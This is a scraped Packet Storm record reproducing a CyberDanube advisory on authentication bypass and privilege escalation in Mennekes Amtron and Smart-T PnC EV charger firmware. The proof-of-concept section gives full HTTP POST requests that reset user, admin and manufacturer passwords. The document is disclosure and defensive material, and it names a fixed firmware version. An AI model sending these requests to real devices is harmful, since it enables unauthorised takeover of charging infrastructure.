{“lastseen”:”2026-06-01T19:08:50″,”description”:”Mennekes Amtron Series and Smart-T PnC version 5.22.3 suffers from authentication bypass and privilege escalation vulnerabilities…”,”published”:”2026-06-01T00:00:00″,”modified”:”2026-06-01T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Mennekes Amtron Series and Smart-T PnC 5.22.3 Authentication Bypass \/ Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:222403″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-8979″,”CVE-2026-8980″],”sourceData”:”CyberDanube Security Research 20260528-0\\n ——————————————————————————-\\n title| Multiple Vulnerabilities\\n product| Mennekes Amtron Series and Smart-T PnC\\n vulnerable version| 5.22.3\\n fixed version| 5.33.11-21500\\n CVE number| CVE-2026-8979, CVE-2026-8980\\n impact| High\\n homepage| https:\/\/www.mennekes.at\/\\n found| 2025-11-27\\n by| S. Eisenreich-Dietz, T. Weber\\n | CyberDanube Security Research\\n | Austria – Vienna\\n | https:\/\/www.cyberdanube.com\\n ——————————————————————————-\\n \\n Vendor description\\n ——————————————————————————-\\n For more than 80 years, MENNEKES has stood for quality electrical products and\\n service throughout the world. When it comes to solutions that handle current\\n intelligently and safely, we set the standard for innovation, quality,\\n manufacturing and development.\\n \\n Source: https:\/\/www.mennekes.com\/about\/about-us\\n \\n \\n Vulnerable Products\\n ——————————————————————————-\\n Amtron Professional\\n Amtron Professional (Eichrecht)\\n Amedio Professional\\n Amtron Charge Control\\n Amtron Professional Twincharge\\n Smart-T PnC\\n \\n Vulnerability Overview\\n ——————————————————————————-\\n 1) Authentication Bypass (CVE-2026-8979)\\n An unauthentication attacker can use a crafted POST request to change the\\n password of the user account.\\n \\n 2) Privilege Escalation (CVE-2026-8980)\\n An authenticated attacker can use a crafted POST request to change the password\\n of the manufacturer and admin account as low privileged user.\\n \\n \\n Proof of Concept\\n ——————————————————————————-\\n 1) Authentication Bypass (CVE-2026-8979)\\n The following POST request can be used to change the password of the user\\n account to \\”asdf\\”\\n \\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n POST \/operator\/operator HTTP\/1.1\\n Host: 10.201.74.66\\n Accept-Language: en-US,en;q=0.9\\n Upgrade-Insecure-Requests: 1\\n User-Agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like\\n Gecko) Chrome\/133.0.0.0 Safari\/537.36\\n Accept:\\n text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,imag\\n e\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7\\n Accept-Encoding: gzip, deflate, br\\n Connection: keep-alive\\n Content-Type: application\/x-www-form-urlencoded\\n Content-Length: 24\\n UserPwdPlain_custom=asdf\\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n \\n \\n 2) Privilege Escalation (CVE-2026-8980)\\n The following POST requests can be used to change the admin (operator) and\\n manufacturer account password to \\”asdf\\”.\\n \\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n POST \/json\/settings.json HTTP\/1.1\\n Host: 10.201.74.66\\n Content-Length: 60\\n Authorization: e81179e1-5e50-45d4-8ee6-27161dcf69d8\\n Accept-Language: en-US,en;q=0.9\\n Accept: application\/json, text\/plain, *\/*\\n Content-Type: application\/json;charset=UTF-8\\n User-Agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like\\n Gecko) Chrome\/133.0.0.0 Safari\/537.36\\n Origin: http:\/\/10.201.74.66\\n Referer: http:\/\/10.201.74.66\/groups\/system\\n Accept-Encoding: gzip, deflate, br\\n Connection: keep-alive\\n {\\”params\\”:[{\\”key\\”:\\”OperatorPwdPlain_custom\\”,\\”value\\”:\\”asd\\”}]}\\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n POST \/json\/settings.json HTTP\/1.1\\n Host: 10.201.74.66\\n Content-Length: 59\\n Authorization: 526ee807-4295-46f3-a9e4-0f4bcac97af9\\n Accept-Language: en-US,en;q=0.9\\n Accept: application\/json, text\/plain, *\/*\\n Content-Type: application\/json;charset=UTF-8\\n User-Agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like\\n Gecko) Chrome\/133.0.0.0 Safari\/537.36\\n Origin: http:\/\/10.201.74.66\\n Referer: http:\/\/10.201.74.66\/groups\/system\\n Accept-Encoding: gzip, deflate, br\\n Connection: keep-alive\\n {\\”params\\”:[{\\”key\\”:\\”ManufacturerPwd_custom\\”,\\”value\\”:\\”asd\\”}]}\\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n \\n \\n Solution\\n ——————————————————————————-\\n Update to the newest Firmware.\\n \\n \\n Workaround\\n ——————————————————————————-\\n Restrict access to the device.\\n \\n \\n Contact Timeline\\n ——————————————————————————-\\n 2025-02-24:\u2002Get in contact with psirt@mennekes.de\\n 2025-02-25:\u2002Vulnerabilities get acknowledged and are forwarded to BENDER\\n as they are the manufacturer for the devices.\\n 2025-03-18:\u2002Ask for update regarding fixes, CVE numbers, fixed version and\\n effected products. Response states that they will not create\\n CVEs.\\n 2025-05-28: Release of advisory.\u2002\u2002\u2002\u2002\\n \\n Web: https:\/\/www.cyberdanube.com\\n Twitter: https:\/\/twitter.com\/cyberdanube\\n Mail: research at cyberdanube dot com\\n \\n EOF S. Eisenreich-Dietz \/ @2026″,”sourceHref”:”https:\/\/packetstorm.news\/download\/222403″,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/SC:H\/VI:H\/SI:H\/VA:H\/SA:H\/E:P”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/222403\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-01T19:08:50″,”description”:”Mennekes Amtron Series and Smart-T PnC version 5.22.3 suffers from authentication bypass and privilege escalation vulnerabilities…”,”published”:”2026-06-01T00:00:00″,”modified”:”2026-06-01T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Mennekes Amtron Series and Smart-T PnC 5.22.3 Authentication Bypass…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,13,53,7,11,5],"class_list":["post-58957","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n